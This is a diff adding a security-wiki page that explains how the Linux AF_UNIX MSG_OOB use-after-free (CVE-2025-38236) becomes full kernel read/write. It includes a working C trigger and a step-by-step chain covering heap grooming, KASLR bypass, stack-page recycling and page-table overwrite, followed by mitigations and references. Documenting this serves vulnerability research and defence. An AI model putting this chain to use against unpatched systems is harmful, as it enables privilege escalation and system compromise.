|
| 1 | +# AF_UNIX MSG_OOB UAF & SKB-based kernel primitives |
| 2 | + |
| 3 | +{{#include ../../banners/hacktricks-training.md}} |
| 4 | + |
| 5 | +## TL;DR |
| 6 | + |
| 7 | +- Linux >=6.9 introduced a flawed `manage_oob()` refactor (`5aa57d9f2d53`) for AF_UNIX `MSG_OOB` handling. Stacked zero-length SKBs bypassed the logic that clears `u->oob_skb`, so a normal `recv()` could free the out-of-band SKB while the pointer remained live, leading to CVE-2025-38236. |
| 8 | +- Re-triggering `recv(..., MSG_OOB)` dereferences the dangling `struct sk_buff`. With `MSG_PEEK`, the path `unix_stream_recv_urg() -> __skb_datagram_iter() -> copy_to_user()` becomes a stable 1-byte arbitrary kernel read; without `MSG_PEEK` the primitive increments `UNIXCB(oob_skb).consumed` at offset `0x44`, i.e., adds +4 GiB to the upper dword of any 64-bit value placed at offset `0x40` inside the reallocated object. |
| 9 | +- By draining order-0/1 unmovable pages (page-table spray), force-freeing an SKB slab page into the buddy allocator, and reusing the physical page as a pipe buffer, the exploit forges SKB metadata in controlled memory to identify the dangling page and pivot the read primitive into `.data`, vmemmap, per-CPU, and page-table regions despite usercopy hardening. |
| 10 | +- The same page can later be recycled as the top kernel-stack page of a freshly cloned thread. `CONFIG_RANDOMIZE_KSTACK_OFFSET` becomes an oracle: by probing the stack layout while `pipe_write()` blocks, the attacker waits until the spilled `copy_page_from_iter()` length (R14) lands at offset `0x40`, then fires the +4 GiB increment to corrupt the stack value. |
| 11 | +- A self-looping `skb_shinfo()->frag_list` keeps the UAF syscall spinning in kernel space until a cooperating thread stalls `copy_from_iter()` (via `mprotect()` over a VMA containing a single `MADV_DONTNEED` hole). Breaking the loop releases the increment exactly when the stack target is live, inflating the `bytes` argument so `copy_page_from_iter()` writes past the pipe buffer page into the next physical page. |
| 12 | +- By monitoring pipe-buffer PFNs and page tables with the read primitive, the attacker ensures the following page is a PTE page, converts the OOB copy into arbitrary PTE writes, and obtains unrestricted kernel read/write/execute. Chrome mitigated reachability by blocking `MSG_OOB` from renderers (`6711812`), and Linux fixed the logic flaw in `32ca245464e1` plus introduced `CONFIG_AF_UNIX_OOB` to make the feature optional. |
| 13 | + |
| 14 | +## Root cause: `manage_oob()` assumes only one zero-length SKB |
| 15 | + |
| 16 | +`unix_stream_read_generic()` expects every SKB returned by `manage_oob()` to have `unix_skb_len() > 0`. After `93c99f21db36`, `manage_oob()` skipped the `skb == u->oob_skb` cleanup path whenever it first removed a zero-length SKB left behind by `recv(MSG_OOB)`. The subsequent fix (`5aa57d9f2d53`) still advanced from the first zero-length SKB to `skb_peek_next()` without re-checking the length. With two consecutive zero-length SKBs, the function returned the second empty SKB; `unix_stream_read_generic()` then skipped it without calling `manage_oob()` again, so the true OOB SKB was dequeued and freed while `u->oob_skb` still pointed to it. |
| 17 | + |
| 18 | +### Minimal trigger sequence |
| 19 | + |
| 20 | +```c |
| 21 | +char byte; |
| 22 | +int socks[2]; |
| 23 | +socketpair(AF_UNIX, SOCK_STREAM, 0, socks); |
| 24 | +for (int i = 0; i < 2; ++i) { |
| 25 | + send(socks[1], "A", 1, MSG_OOB); |
| 26 | + recv(socks[0], &byte, 1, MSG_OOB); |
| 27 | +} |
| 28 | +send(socks[1], "A", 1, MSG_OOB); // SKB3, u->oob_skb = SKB3 |
| 29 | +recv(socks[0], &byte, 1, 0); // normal recv frees SKB3 |
| 30 | +recv(socks[0], &byte, 1, MSG_OOB); // dangling u->oob_skb |
| 31 | +``` |
| 32 | +
|
| 33 | +## Primitives exposed by `unix_stream_recv_urg()` |
| 34 | +
|
| 35 | +1. **1-byte arbitrary read (repeatable):** `state->recv_actor()` ultimately performs `copy_to_user(user, skb_sourced_addr, 1)`. If the dangling SKB is reallocated into attacker-controlled memory (or into a controlled alias such as a pipe page), every `recv(MSG_OOB | MSG_PEEK)` copies a byte from an arbitrary kernel address allowed by `__check_object_size()` to user space without crashing. Keeping `MSG_PEEK` set preserves the dangling pointer for unlimited reads. |
| 36 | +2. **Constrained write:** When `MSG_PEEK` is clear, `UNIXCB(oob_skb).consumed += 1` increments the 32-bit field at offset `0x44`. On 0x100-aligned SKB allocations this sits four bytes above an 8-byte aligned word, converting the primitive into a +4 GiB increment of the word hosted at offset `0x40`. Turning this into a kernel write requires positioning a sensitive 64-bit value at that offset. |
| 37 | +
|
| 38 | +## Reallocating the SKB page for arbitrary read |
| 39 | +
|
| 40 | +1. **Drain order-0/1 unmovable freelists:** Map a huge read-only anonymous VMA and fault every page to force page-table allocation (order-0 unmovable). Filling ~10% of RAM with page tables ensures subsequent `skbuff_head_cache` allocations pull fresh buddy pages once order-0 lists exhaust. |
| 41 | +2. **Spray SKBs and isolate a slab page:** Use dozens of stream socketpairs and queue hundreds of small messages per socket (~0x100 bytes per SKB) to populate `skbuff_head_cache`. Free chosen SKBs to drive a target slab page entirely under attacker control and monitor its `struct page` refcount via the emerging read primitive. |
| 42 | +3. **Return the slab page to the buddy allocator:** Free every object on the page, then perform enough additional allocations/frees to push the page out of SLUB per-CPU partial lists and per-CPU page lists so it becomes an order-1 page on the buddy freelist. |
| 43 | +4. **Reallocate as pipe buffer:** Create hundreds of pipes; each pipe reserves at least two 0x1000-byte data pages (`PIPE_MIN_DEF_BUFFERS`). When the buddy allocator splits an order-1 page, one half reuses the freed SKB page. To locate which pipe and which offset aliases `oob_skb`, write unique marker bytes into fake SKBs stored throughout pipe pages and issue repeated `recv(MSG_OOB | MSG_PEEK)` calls until the marker is returned. |
| 44 | +5. **Forge a stable SKB layout:** Populate the aliased pipe page with a fake `struct sk_buff` whose `data`/`head` pointers and `skb_shared_info` structure point to arbitrary kernel addresses of interest. Because x86_64 disables SMAP inside `copy_to_user()`, user-mode addresses can serve as staging buffers until kernel pointers are known. |
| 45 | +6. **Respect usercopy hardening:** The copy succeeds against `.data/.bss`, vmemmap entries, per-CPU vmalloc ranges, other threads' kernel stacks, and direct-map pages that do not straddle higher-order folio boundaries. Reads against `.text` or specialized caches rejected by `__check_heap_object()` simply return `-EFAULT` without killing the process. |
| 46 | +
|
| 47 | +## Introspecting allocators with the read primitive |
| 48 | +
|
| 49 | +- **Break KASLR:** Read any IDT descriptor from the fixed mapping at `CPU_ENTRY_AREA_RO_IDT_VADDR` (`0xfffffe0000000000`) and subtract the known handler offset to recover the kernel base. |
| 50 | +- **SLUB/buddy state:** Global `.data` symbols reveal `kmem_cache` bases, while vmemmap entries expose each page's type flags, freelist pointer, and owning cache. Scanning per-CPU vmalloc segments uncovers `struct kmem_cache_cpu` instances so the next allocation address of key caches (e.g., `skbuff_head_cache`, `kmalloc-cg-192`) becomes predictable. |
| 51 | +- **Page tables:** Instead of reading `mm_struct` (blocked by usercopy), walk the global `pgd_list` (`struct ptdesc`) and match the current `mm_struct` via `cpu_tlbstate.loaded_mm`. Once the root `pgd` is known, the primitive can traverse every page table to map PFNs for pipe buffers, page tables, and kernel stacks. |
| 52 | +
|
| 53 | +## Recycling the SKB page as the top kernel-stack page |
| 54 | +
|
| 55 | +1. Free the controlled pipe page again and confirm via vmemmap that its refcount returns to zero. |
| 56 | +2. Immediately allocate four helper pipe pages and then free them in reverse order so the buddy allocator's LIFO behavior is deterministic. |
| 57 | +3. Call `clone()` to spawn a helper thread; Linux stacks are four pages on x86_64, so the four most recently freed pages become its stack, with the last freed page (the former SKB page) at the highest addresses. |
| 58 | +4. Verify via page-table walk that the helper thread's top stack PFN equals the recycled SKB PFN. |
| 59 | +5. Use the arbitrary read to observe the stack layout while steering the thread into `pipe_write()`. `CONFIG_RANDOMIZE_KSTACK_OFFSET` subtracts a random 0x0–0x3f0 (aligned) from `RSP` per syscall; repeated writes combined with `poll()`/`read()` from another thread reveal when the writer blocks with the desired offset. When lucky, the spilled `copy_page_from_iter()` `bytes` argument (R14) sits at offset `0x40` inside the recycled page. |
| 60 | +
|
| 61 | +## Placing fake SKB metadata on the stack |
| 62 | +
|
| 63 | +- Use `sendmsg()` on an AF_UNIX datagram socket: the kernel copies the user `sockaddr_un` into a stack-resident `sockaddr_storage` (up to 108 bytes) and the ancillary data into another on-stack buffer before the syscall blocks waiting for queue space. This allows planting a precise fake SKB structure in stack memory. |
| 64 | +- Detect when the copy finished by supplying a 1-byte control message located in an unmapped user page; `____sys_sendmsg()` faults it in, so a helper thread polling `mincore()` on that address learns when the destination page is present. |
| 65 | +- Zero-initialized padding from `CONFIG_INIT_STACK_ALL_ZERO` conveniently fills unused fields, completing a valid SKB header without extra writes. |
| 66 | +
|
| 67 | +## Timing the +4 GiB increment with a self-looping frag list |
| 68 | +
|
| 69 | +- Forge `skb_shinfo(fakeskb)->frag_list` to point to a second fake SKB (stored in attacker-controlled user memory) that has `len = 0` and `next = &self`. When `skb_walk_frags()` iterates this list inside `__skb_datagram_iter()`, execution spins indefinitely because the iterator never reaches `NULL` and the copy loop makes no progress. |
| 70 | +- Keep the recv syscall running inside the kernel by letting the second fake SKB self-loop. When it's time to fire the increment, simply change the second SKB's `next` pointer from user space to `NULL`. The loop exits and `unix_stream_recv_urg()` immediately executes `UNIXCB(oob_skb).consumed += 1` once, affecting whatever object currently occupies the recycled stack page at offset `0x40`. |
| 71 | +
|
| 72 | +## Stalling `copy_from_iter()` without userfaultfd |
| 73 | +
|
| 74 | +- Map a giant anonymous RW VMA and fault it in fully. |
| 75 | +- Punch a single-page hole with `madvise(MADV_DONTNEED, hole, PAGE_SIZE)` and place that address inside the `iov_iter` used for `write(pipefd, user_buf, 0x3000)`. |
| 76 | +- In parallel, call `mprotect()` on the entire VMA from another thread. The syscall grabs the mmap write lock and walks every PTE. When the pipe writer reaches the hole, the page fault handler blocks on the mmap lock held by `mprotect()`, pausing `copy_from_iter()` at a deterministic point while the spilled `bytes` value resides on the stack segment hosted by the recycled SKB page. |
| 77 | +
|
| 78 | +## Turning the increment into arbitrary PTE writes |
| 79 | +
|
| 80 | +1. **Fire the increment:** Release the frag loop while `copy_from_iter()` is stalled so the +4 GiB increment hits the `bytes` variable. |
| 81 | +2. **Overflow the copy:** Once the fault resumes, `copy_page_from_iter()` believes it can copy >4 GiB into the current pipe page. After filling the legitimate 0x2000 bytes (two pipe buffers), it executes another iteration and writes the remaining user data into whatever physical page follows the pipe buffer PFN. |
| 82 | +3. **Arrange adjacency:** Using allocator telemetry, force the buddy allocator to place a process-owned PTE page immediately after the target pipe buffer page (e.g., alternate between allocating pipe pages and touching new virtual ranges to trigger page-table allocation until the PFNs align inside the same 2 MiB pageblock). |
| 83 | +4. **Overwrite page tables:** Encode desired PTE entries in the extra 0x1000 bytes of user data so the OOB `copy_from_iter()` fills the neighbouring page with attacker-chosen entries, granting RW/RWX user mappings of kernel physical memory or rewriting existing entries to disable SMEP/SMAP. |
| 84 | +
|
| 85 | +## Mitigations / hardening ideas |
| 86 | +
|
| 87 | +- **Kernel:** Apply `32ca245464e1479bfea8592b9db227fdc1641705` (properly revalidates SKBs) and consider disabling AF_UNIX OOB entirely unless strictly needed via `CONFIG_AF_UNIX_OOB` (`5155cbcdbf03`). Harden `manage_oob()` with additional sanity checks (e.g., loop until `unix_skb_len() > 0`) and audit other socket protocols for similar assumptions. |
| 88 | +- **Sandboxing:** Filter `MSG_OOB`/`MSG_PEEK` flags in seccomp profiles or higher-level broker APIs (Chrome change `6711812` now blocks renderer-side `MSG_OOB`). |
| 89 | +- **Allocator defenses:** Strengthening SLUB freelist randomization or enforcing per-cache page coloring would complicate deterministic page recycling; pipeline-limiting of pipe buffer counts also reduces reallocation reliability. |
| 90 | +- **Monitoring:** Expose high-rate page-table allocation or abnormal pipe usage via telemetry—this exploit burns large amounts of page tables and pipe buffers. |
| 91 | +
|
| 92 | +## References |
| 93 | +
|
| 94 | +- [Project Zero – "From Chrome renderer code exec to kernel with MSG_OOB"](https://projectzero.google/2025/08/from-chrome-renderer-code-exec-to-kernel.html) |
| 95 | +- [Linux fix for CVE-2025-38236 (`manage_oob` revalidation)](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=32ca245464e1479bfea8592b9db227fdc1641705) |
| 96 | +- [Chromium CL 6711812 – block `MSG_OOB` in renderers](https://chromium-review.googlesource.com/c/chromium/src/+/6711812) |
| 97 | +- [Commit adding `CONFIG_AF_UNIX_OOB` prompt](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5155cbcdbf03f207095f9a3794942a25aa7e5f58) |
| 98 | +
|
| 99 | +{{#include ../../banners/hacktricks-training.md}} |
0 commit comments